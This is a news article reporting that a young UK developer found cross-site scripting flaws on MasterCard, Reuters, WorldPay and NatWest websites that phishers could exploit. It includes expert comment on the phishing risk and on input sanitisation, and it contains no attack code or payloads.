Leading financial institutions have adopted a more aggressive attitude toward online identity theft cons known as "phishing scams" in recent months. But companies, including MasterCard, may be unwittingly helping phishers trick online shoppers, says a new report from a UK web developer.
A test of leading financial services websites, including those run by MasterCard, NatWest and Reuters, revealed that many have loosely protected features that scam artists can use to mask their own sites, hijacking the name and web address of established institutions, said Sam Greenhalgh, who operates www.zapthedingbat.com.
Nineteen-year-old Greenhalgh is responsible for discovering a vulnerability in Microsoft's Internet Explorer web browser known as the "%01" vulnerability. That security hole, since closed by the company, was widely used in phishing scams to disguise the location of phishing websites, which online scam artists use to harvest sensitive personal and financial information from their victims. He published a report at zapthedingbat.com on his latest findings.
Phishing scams use spam e-mail to direct internet users to sites controlled by thieves, but designed to look like legitimate e-commerce operations. Users are asked to provide sensitive information such as a password, Social Security number, bank account or credit card number, often under the guise of updating account information.
The security lapses at major financial sites are not caused by flawed Microsoft products, Greenhalgh said, the trick works with most popular web browsers. Instead, poorly designed and insecure features on leading sites containing "cross-site scripting" vulnerabilities are to blame, he said.
Greenhalgh uses the example of an "ATM Locator" feature on MasterCard's website. The locator was designed to pinpoint cash machines that accept MasterCard. Users input a location, including a country and street address, and the site provides the location of cash machines in the area. However, because of a cross-site scripting vulnerability, Greenhalgh was able to inject his own HTML into the fields used by the ATM Locator, causing the mastercard.com site to display his content, including a mock form that could be used to harvest information.
With the web browser address bar reading "www.mastercard.com" and the MasterCard logo on the page, even sophisticated web surfers would be hard put to prove they were not interacting with the credit card company instead of scam artists, Greenhalgh said.
"The danger to the public is in increasing their susceptibility," Greenhalgh said. "Phishing attacks have been around a long time and usually they're very easy to spot - you can look in the address bar and see you're not at mastercard.com. But these flaws allow phishers to actually use the legitimate site. As a user, it's very hard to tell," he said.
MasterCard declined to comment, and NatWest did not immediately respond.
Web search features are a common source of cross-site scripting flaws, especially those that echo back the requested search word or phrase to users, Greenhalgh said.
Greenhalgh's website notes similar flaws in seven other sites, including attacks on search features at reuters.com, internet payment service WorldPay and NatWest bank.
"In effect what I am doing is using something that is designed to trust user input too much," he said.
Among other things, developers should design web formsto validate the data that users enter into the fields and "sanitise" it, removing characters such as brackets that are used to render HTML and other computer code.
The flaws are easy to fix, but have been overlooked for years. Still, Greenhalgh doesn't believe that the cross-site scripting holes have been exploited in phishing attacks at the institutions he named - at least not yet.
The cross-site scripting vulnerability is an old exploit that has been around for a long time, but hasn't yet been exploited by scam artists, said Dave Kurzynski, chief technology officer of internet brand protection firm NameProtect. Still, the vulnerability could become more common as easier avenues to trick consumers were closed to scammers, he said.
The cross-site scripting problems at leading financial services sites couldn't be used to distribute malicious code, unlike a recent flaw in Microsoft's Internet Information Services Web server. However, they could be used to fool web surfers into downloading malicious code, such as ActiveX programs created by scam artists or hackers, he said.
Shoddy coding by web developers is mostly responsible, but the companies are also to blame, he said.
"I think it's a matter of the attitude that both developers and their employers have to their product and the quality of service that they are giving to customers. Quality of service not just a factor of what the customer perceives. It's a whole package."
Companies from all industries should be looking at their websites and web-based applications carefully with cross-site scripting vulnerabilties in mind, Kurzynski said.
"Any website that accepts text input and displays it is possibly vulnerable. Any newly written application should be designed with this in mind and legacy applications which have been in use since this exploit was discovered need to be changed to protect against it," he said.
Greenhalgh did not notify companies mentioned in the report about the problems. Doing so would only allow them to correct the problem without addressing the larger security issues facing their sites, he said.
The number of phishing attacks has risen sharply in recent months, according to industry groups.
The number of unique attacks reported to the Anti-Phishing Working Group (APWG) increased 6% in May to 1,197, with an average of 38.6 reports each day. Financial services companies are the primary target of the scams, according to the APWG.
In June, MasterCard announced a partnership with NameProtect to combat phishing. The two companies are combining their efforts, giving MasterCard access to data from NameProtect's technology, which can search and filter large volumes of internet content to find online scams. The companies will also work with law enforcement to shut down internet sites and tools used by identity thieves.
Raising public awareness of the flaws may be the only way to spur widespread action, Greenhalgh said. "If they get egg on their face, that's par for the course. I think that might help in a way," he said.
Paul Roberts writes for IDG News Service